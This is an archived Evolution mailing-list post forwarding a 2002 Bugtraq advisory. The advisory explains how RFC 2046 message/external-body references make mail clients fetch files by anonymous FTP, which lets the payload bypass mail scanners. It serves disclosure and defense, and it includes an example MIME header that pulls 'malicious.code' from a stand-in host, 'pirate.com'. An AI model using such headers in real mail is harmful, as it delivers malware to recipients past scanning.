[Evolution] [Fwd: Another possible RFC 2046 vulnerability.]

From: Richard Bellavance <richard bellavance enter-net com>
To: evolution ximian com
Subject: [Evolution] [Fwd: Another possible RFC 2046 vulnerability.]
Date: 27 Sep 2002 11:48:04 -0400

I hope support for this aberration will not be integrated into
Evolution...

At least, 1.0.8 does not seem to support it.

-- 
Richard Bellavance                   COGNICASE inc.
Analyste-programmeur principal       Hébergement, sécurité et réseaux
T.: 514-732-8000 #4153               20, Place du Commerce
F.: 514-732-8021                     Verdun, Qc, H3E 1Z6, CANADA

--- Begin Message ---

From: Jose Marcio Martins da Cruz <Jose-Marcio Martins ensmp fr>
To: bugtraq <bugtraq securityfocus com>
Subject: Another possible RFC 2046 vulnerability.
Date: Fri, 27 Sep 2002 13:01:46 +0200


Hi,

Some days ago, we're talking about RFC 2046 message fragmentation
vulnerability.

There is another related RFC 2046 vulnerability : message/external-body
message type.

RFC 2046 message/external-body MIME type allows to send messages not by
it's content, but by reference.

In this case, you can send a message with the following MIME tag :

   Content-Type: message/external-body; name="malicious.code";
                 site="pirate.com"; mode="image";
                 access-type=ANON-FTP; directory="pub"

Client MUA, receives this and will get "malicious.code" file by
anonymous ftp from pirate.com ftp server.

RFC 2046 defines five access-types :"FTP", "ANON-FTP", "TFTP",
"LOCAL-FILE", and "MAIL-SERVER".

There are some other optional parameters to this feature.  For example,
if the message includes parameter permission="write", existing file will
be overwriten.

RFC 2046 says something about security in paragraph 5.2.3.6 :

   (1)   Accessing data via a "message/external-body" reference
         effectively results in the message recipient performing
         an operation that was specified by the message
         originator.  It is therefore possible for the message
         originator to trick a recipient into doing something
         they would not have done otherwise.  ...


Combining different access-types (mainly anon-ftp, mail-server and
local-file) can create; IMHO, more complex attacks.

What's interesting is that in this case the message and the malicious
code passes through two different network paths : messages is sent by
mail and the malicious code will be get by receiver by anonymous ftp.

In the case of previous vulnerability (fragmented message), message and
malicious code uses the same network path.

Classical mail server virus scanners will never see the malicious code
pass through it, as they will never have available entire malicious
code.

The only way to detect it, IMHO, at mail server, is by lexical analysis
of MIME tags.

Netscape Communicator 4.79 is compatible with this RFC 2046 feature.

I can't say anything about others mail clients, as I'm sick at home and
I have no access to other MUAs. 

Attached to this message you'll find a message sent using this feature
and allowing you to get  RFC 2046 by anonymous ftp. Maybe someone can
check it out with Outlook and other popular MUAs. It's in the /var/mail
format : you can append it to your mailbox and try it... 8-)

References : RFC 2046 - MIME - Media Types

Jose Marcio


-- 
 -------------------------------------------------------------------
 Jose Marcio MARTINS DA CRUZ     
 Ecole Nationale Superieure des Mines de Paris    
 Centre de Calcul                             Tel . : 01.40.51.93.41
 60, bd Saint Michel                    http://www.ensmp.fr/~martins
 75272 - PARIS CEDEX 06                   mailto:martins cc ensmp fr

--- End Message ---

Follow-Ups:
- Re: [Evolution] [Fwd: Another possible RFC 2046 vulnerability.]
  - From: Dan Winship
- Re: [Evolution] [Fwd: Another possible RFC 2046 vulnerability.]
  - From: Jeffrey Stedfast

[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]